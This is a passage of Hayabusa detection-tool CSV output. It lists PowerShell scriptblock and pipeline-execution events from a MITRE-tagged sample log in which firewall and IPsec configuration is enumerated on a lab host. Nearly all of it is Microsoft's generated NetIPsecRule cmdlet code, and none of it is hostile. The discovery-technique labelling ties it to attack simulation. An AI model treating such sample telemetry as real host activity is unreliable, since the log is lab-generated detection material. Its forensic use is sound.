$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; Param",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,eterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = 